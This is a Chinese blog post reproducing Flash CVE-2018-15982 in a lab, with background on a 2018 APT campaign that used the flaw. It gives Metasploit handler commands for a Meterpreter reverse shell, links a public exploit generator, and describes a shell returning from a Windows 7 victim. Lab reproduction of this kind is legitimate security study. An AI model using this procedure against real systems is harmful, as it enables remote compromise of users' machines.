前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Flash CVE-2018-15982 漏洞复现

Flash CVE-2018-15982 漏洞复现

作者头像
墙角睡大觉
发布2019-09-24 15:58:56
9090
发布2019-09-24 15:58:56
举报
文章被收录于专栏:安全漏洞环境学习

2018年11月25日,乌俄两国又突发了“刻赤海峡”事件,乌克兰的数艘海军军舰在向刻赤海峡航行期间,与俄罗斯海军发生了激烈冲突,引发了全世界的高度关注。在2018年11月29日,“刻赤海峡”事件后稍晚时间,某团队立刻发起了针对俄罗斯的APT攻击行动。值得注意的是此次攻击相关样本来源于乌克兰,攻击目标则指向俄罗斯总统办公室所属的医疗机构。攻击者精心准备了一份俄文内容的员工问卷文档,该文档使用了最新的Flash 0day漏洞CVE-2018-15982和带有自毁功能的专属木马程序进行攻击,种种技术细节表明该APT组织不惜代价要攻下目标,但同时又十分小心谨慎。在发现攻击后,Adobe官方及时响应后在12月5日加急发布了新的Flash 32.0.0.101版本修复了此次的0day漏洞。

受影响版本包括:

下面我们就此版本进行漏洞攻击实验。

0X1 环境搭建

攻击机:kali3.0

靶 机: Win7/Win10,安装flash旧版本

0X2 漏洞利用

首先利用Metasploit的msfvenom创建payload攻击程序:

监听payload,用来接受反弹的shell:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp_rc4

set LPORT 6666

set LHOST 192.168.0.104

set RC4PASSWORD zale

接下来,我们生成攻击的程序和网页,生成脚本EXP下载地址:

https://github.com/Ridter/CVE-2018-15982_EXP

通过-h参数查看脚本使用:

利用该脚本对刚才的文件进行利用,生成漏洞文件:

将该文件拷贝到kali下的web环境中,并开启apache服务:

我们在Win7上安装的flag版本是:Adobe_Flash_Player_28.0.0.111版本

安装完毕后,访问kali的http服务:

kali中查看监听设置,发现shell已经过来了:

0X3漏洞修复

升级到flash的最新版本

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-01-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 安全漏洞环境学习 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
脆弱性检测服务
脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档